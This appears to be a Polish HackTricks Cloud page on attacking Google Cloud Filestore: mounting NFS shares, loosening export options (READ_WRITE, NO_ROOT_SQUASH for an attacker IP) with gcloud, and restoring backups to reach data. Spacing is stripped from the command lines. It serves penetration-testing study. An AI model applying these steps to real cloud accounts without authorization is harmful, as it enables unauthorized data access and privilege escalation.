Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y doHackTricks i HackTricks Cloud github repos.
Filestore
Aby uzyskać więcej informacji na temat Filestore, sprawdź:
Zamontuj Filestore
Współdzielony system plików może zawierać poufne informacje, które mogą być interesujące z perspektywy atakującego. Mając dostęp do Filestore, można go zamontować:
sudoapt-getupdatesudoapt-getinstallnfs-common# Check the share nameshowmount-e<IP># Mount the sharemkdir/mnt/fssudomount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs
Aby znaleźć adres IP instancji Filestore, sprawdź sekcję wyliczania na stronie:
Usuń ograniczenia i uzyskaj dodatkowe uprawnienia
Jeśli atakujący nie ma dostępu do adresu IP z dostępem do udostępnienia, ale masz wystarczające uprawnienia do jego modyfikacji, można usunąć ograniczenia lub uzyskać do niego dostęp. Możliwe jest również przyznanie większych uprawnień dla adresu IP, aby uzyskać dostęp administratora do udostępnienia:
gcloudfilestoreinstancesupdatenfstest \--zone=<exact-zone> \--flags-file=nfs.json# Contents of nfs.json{"--file-share":{"capacity":"1024","name":"<share-name>","nfs-export-options": [{"access-mode":"READ_WRITE","ip-ranges": ["<your-ip-private-address>/32"],"squash-mode":"NO_ROOT_SQUASH","anon_uid":1003,"anon_gid":1003}]}}
Przywróć kopię zapasową
Jeśli istnieje kopia zapasowa, można ją przywrócić w istniejącej lub nowej instancji, aby jej informacje stały się dostępne:
# Create a new filestore if you don't want to modify the old onegcloudfilestoreinstancescreate<new-instance-name> \--zone=<zone> \--tier=STANDARD \--file-share=name=vol1,capacity=1TB \--network=name=default,reserved-ip-range=10.0.0.0/29# Restore a backups in a new instancegcloudfilestoreinstancesrestore<new-instance-name> \--zone=<zone> \--file-share=<instance-file-share-name> \--source-backup=<backup-name> \--source-backup-region=<backup-region># Follow the previous section commands to mount it
Utwórz kopię zapasową i przywróć ją
Jeśli nie masz dostępu do udostępnienia i nie chcesz go modyfikować, istnieje możliwość utworzenia kopii zapasowej i przywrócenia jej, jak wcześniej wspomniano:
# Create share backupgcloudfilestorebackupscreate<back-name> \--region=<region> \--instance=<instance-name> \--instance-zone=<instance-zone> \--file-share=<share-name># Follow the previous section commands to restore it and mount it